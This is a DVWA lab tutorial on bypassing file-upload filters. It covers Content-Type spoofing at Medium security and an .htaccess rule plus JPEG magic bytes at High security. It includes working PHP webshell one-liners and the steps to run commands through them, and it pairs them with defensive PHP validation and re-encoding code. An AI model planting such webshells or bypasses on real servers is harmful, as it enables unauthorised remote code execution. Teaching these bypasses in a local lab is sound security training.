Originally published on SecurityElites, where the canonical, fully updated version of this article is maintained.
DVWA Lab Series: Lab 18 of 30
Local Lab Only: File upload bypass techniques must only be practised against your own DVWA installation. Uploading webshells to any server without written authorisation is a criminal offence.
# DVWA File Upload Advanced Lab 2026

Lab 6 showed you basic webshell upload at Low security, where no filtering exists. Medium and High security add filters that check Content-Type, extension, and image validity. Each filter checks something specific and leaves something else unchecked. Medium trusts the browser-submitted Content-Type but never looks at the actual file. High checks the extension and magic bytes but may still allow .htaccess files that redefine how the server executes uploaded content. Lab 18 bypasses all three levels systematically: read the source, identify the gap, use the exact bypass the gap enables.
### What You'll Learn in Lab 18

- Bypass Medium security via Content-Type (MIME) spoofing in Burp
- Bypass High security using .htaccess upload to redefine PHP execution
- Understand the double extension bypass and when it applies
- Use magic byte injection to pass getimagesize() validation
- Execute uploaded webshells and achieve RCE on each security level
40 min · 3 exercises

### Prerequisites

- Lab 6: File Upload basics; Low security webshell upload understood
- Lab 14: Security Levels; comfortable reading PHP source
- Burp Suite configured with browser proxy

### DVWA File Upload Advanced Lab 18 Contents: Upload Filter Bypass

1. Medium Security: MIME Spoofing Bypass
2. High Security: .htaccess Upload and Magic Bytes
3. Executing the Webshell After Upload

In Lab 6 you uploaded a PHP webshell at Low security. Lab 18 builds directly on that: same goal (PHP execution), different obstacles. The same source code reading methodology from Lab 14 applies: check the filter logic first, identify the gap, apply the specific bypass. The DVWA Lab Series teaches technique recognition, not just exploit execution.
## Medium Security: MIME Spoofing Bypass

Medium security source and bypass. View Source at Medium; the entire upload filter is:

```php
$uploaded_type = $_FILES['uploaded']['type'];   // the BROWSER-SUBMITTED Content-Type
$uploaded_size = $_FILES['uploaded']['size'];

if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) ) {
    // the file is moved into hackable/uploads/ under its original name
}
```

`$uploaded_type` comes straight from the multipart header the client sent; it is never validated against the actual file content.

Bypass: change the Content-Type header in Burp.

1. Create the webshell:
   `echo '<?php system($_GET["cmd"]); ?>' > shell.php`
2. Upload shell.php with Burp intercepting.
3. In Burp Proxy, intercept the upload request and change the file part's Content-Type line:
   ```
   Original: Content-Type: application/octet-stream
   Modified: Content-Type: image/jpeg
   ```
4. Forward the modified request. The response reports `succesfully uploaded` and the path `//localhost/dvwa/hackable/uploads/shell.php`.
### Exercise 1: DVWA (12 min)

Bypass Medium Security via MIME Spoofing in Burp

Time: 12 minutes · DVWA Medium · Burp Suite active

Medium bypass, complete steps:

1. Create a minimal PHP webshell:
   `echo '<?php if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>' > /tmp/shell.php`
2. Open DVWA File Upload at Medium security.
3. Burp Suite: Proxy, Intercept ON.
4. Select /tmp/shell.php and click Upload.
5. In the Burp intercepted request, find the Content-Type line of the file part:
   ```
   Content-Disposition: form-data; name="uploaded"; filename="shell.php"
   Content-Type: application/octet-stream    <- change this
   Content-Type: image/jpeg                  <- to this
   ```
6. Forward. The request succeeds: `succesfully uploaded`.
7. Navigate to the uploaded file URL:
   `http://localhost/dvwa/hackable/uploads/shell.php?cmd=id`
   Output: `uid=33(www-data) gid=33(www-data)`
What you just learned: The MIME spoofing bypass demonstrates that trusting browser-submitted headers for security decisions is fundamentally broken. The browser submits Content-Type as part of the multipart form data, and that value is trivially modifiable by any proxy. The server never looks at the actual bytes of the uploaded file. Professional web application assessors always test file uploads by modifying the Content-Type in Burp: it is a one-step bypass that works against any application that relies on Content-Type alone. The fix is server-side validation: use PHP's finfo_file() or getimagesize() to inspect the actual file content on disk, not the browser-claimed Content-Type.
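A server-side version of that fix, added here as an example and not DVWA's own code. It assumes PHP 8 with the fileinfo extension, DVWA's `uploaded` form field name, and the same 100000-byte limit as the Medium source; `validate_image_upload()` is a hypothetical helper name.

```php
<?php
// Added example (not DVWA's code). Assumes PHP 8 with the fileinfo extension and
// the DVWA form field name 'uploaded'; the 100000-byte limit mirrors the Medium source.
declare(strict_types=1);

const MAX_UPLOAD_BYTES = 100000;
// Detected MIME type => extensions the client-supplied filename may carry.
const IMAGE_TYPES = ['image/jpeg' => ['jpg', 'jpeg'], 'image/png' => ['png']];

/**
 * Inspect the bytes that actually landed in the temp file. Returns the detected
 * MIME type on success, or null if the upload must be rejected. The browser's
 * $_FILES[...]['type'] is deliberately never read: it is attacker-controlled.
 * These checks close the Medium gap; a file with a prepended image signature can
 * still satisfy them, so never execute anything from the upload directory.
 */
function validate_image_upload(string $tmpPath, string $clientName, int $size): ?string
{
    if ($size <= 0 || $size > MAX_UPLOAD_BYTES || !is_file($tmpPath)) {
        return null;
    }
    // 1. libmagic looks at the file signature on disk, not the multipart header.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $detected = $finfo !== false ? finfo_file($finfo, $tmpPath) : false;
    if (!is_string($detected) || !isset(IMAGE_TYPES[$detected])) {
        return null;
    }
    // 2. getimagesize() parses the image header independently; both must agree.
    $info = @getimagesize($tmpPath);
    if ($info === false || ($info['mime'] ?? '') !== $detected) {
        return null;
    }
    // 3. The client-supplied name may only carry an extension matching the detected
    //    type; a dotfile such as ".htaccess" has no usable extension and is refused.
    $base = basename($clientName);
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($base === '' || $base[0] === '.' || !in_array($ext, IMAGE_TYPES[$detected], true)) {
        return null;
    }
    return $detected;
}

// Handler sketch: only the verdict is used here; the original filename is never reused.
if (isset($_FILES['uploaded']) && is_uploaded_file($_FILES['uploaded']['tmp_name'])) {
    $f = $_FILES['uploaded'];
    $mime = validate_image_upload($f['tmp_name'], $f['name'], (int) $f['size']);
    echo $mime === null ? 'Your image was not uploaded.' : 'Accepted as ' . htmlspecialchars($mime);
}
```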
## High Security: .htaccess Upload and Magic Bytes

High security adds two additional checks: getimagesize(), which validates that the file has valid image dimensions (checking magic bytes), and an extension whitelist that only accepts .jpg, .jpeg, and .png. The getimagesize() check can be bypassed by prepending valid image magic bytes to the PHP webshell. The extension check can be bypassed by uploading an .htaccess file (if the server accepts it) that redefines how certain extensions are executed.
### Exercise 2: DVWA (15 min)

Bypass High Security Using .htaccess Upload

Time: 15 minutes · DVWA High security · Burp Suite

High bypass, .htaccess method:

1. Create an .htaccess that makes .jpg execute as PHP:
   `echo 'AddType application/x-httpd-php .jpg' > /tmp/.htaccess`
2. Upload .htaccess via DVWA (with Burp). .htaccess has no extension, and High security checks the file extension; since the .htaccess filename does not end in a blocked extension, it may pass. Change Content-Type to image/jpeg in Burp if needed.
3. Create a webshell with a .jpg extension:
   `echo '<?php system($_GET["cmd"]); ?>' > /tmp/shell.jpg`
4. Add JPEG magic bytes to pass getimagesize():
   ```bash
   printf '\xff\xd8\xff' > /tmp/magic_shell.jpg
   cat /tmp/shell.jpg >> /tmp/magic_shell.jpg
   ```
   The file now starts with the JPEG magic bytes (passes getimagesize) and contains PHP code (executed because of the .htaccess rule).
5. Upload magic_shell.jpg. High security checks: extension (.jpg, passes) and getimagesize (magic bytes, passes). Upload succeeds.
6. Execute via URL (Apache executes .jpg as PHP due to .htaccess):
   `http://localhost/dvwa/hackable/uploads/magic_shell.jpg?cmd=id`
   Output: `uid=33(www-data)`; PHP executed despite the .jpg extension.
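What the High-level checks leave open is that the stored file keeps the client's bytes and name, so a prepended signature plus an .htaccess rule is enough. An added example, not DVWA's code, that re-encodes the validated image through GD and stores it under a server-chosen name; it assumes PHP 8 with GD, an upload directory served with PHP handlers off and AllowOverride None (so an uploaded .htaccess is ignored), a placeholder directory path, and the hypothetical helper name `store_image_reencoded()`.

```php
<?php
// Added example (not DVWA's code). Assumes PHP 8 with GD and an upload directory
// served with PHP handlers off and AllowOverride None, so an uploaded .htaccess
// is never honoured even if one slips through the extension check.
declare(strict_types=1);

// IMAGETYPE constant => [GD decoder, extension to store under]
const DECODERS = [
    IMAGETYPE_JPEG => ['imagecreatefromjpeg', 'jpg'],
    IMAGETYPE_PNG  => ['imagecreatefrompng',  'png'],
];

/**
 * Re-encode an already validated image through GD and store it under a random,
 * server-chosen name. "\xff\xd8\xff<?php ..." carries a JPEG signature but is not
 * a decodable JPEG, so the decoder fails and the file is dropped; a genuine image
 * with PHP hidden in a comment segment loses that segment on re-encode.
 * Returns the stored filename, or null if the upload was refused.
 */
function store_image_reencoded(string $tmpPath, string $uploadDir): ?string
{
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset(DECODERS[$info[2]])) {
        return null;                   // anything but JPEG/PNG is refused
    }
    [$decoder, $ext] = DECODERS[$info[2]];
    $img = @$decoder($tmpPath);
    if ($img === false) {
        return null;                   // signature said "image", the decoder disagreed
    }
    // Random name; the extension comes from the decoded type, never from the
    // client-supplied filename, so "shell.jpg" or "x.php.jpg" never reach disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if ($ext === 'png') {
        imagesavealpha($img, true);
        $ok = imagepng($img, $dest);
    } else {
        $ok = imagejpeg($img, $dest, 90);
    }
    imagedestroy($img);
    return $ok ? $name : null;
}

// Handler sketch using DVWA's form field name; the directory path is a placeholder.
if (isset($_FILES['uploaded']) && is_uploaded_file($_FILES['uploaded']['tmp_name'])) {
    $stored = store_image_reencoded($_FILES['uploaded']['tmp_name'], '/var/www/private_uploads');
    echo $stored === null ? 'Your image was not uploaded.' : 'Stored as ' . htmlspecialchars($stored);
}
```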
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.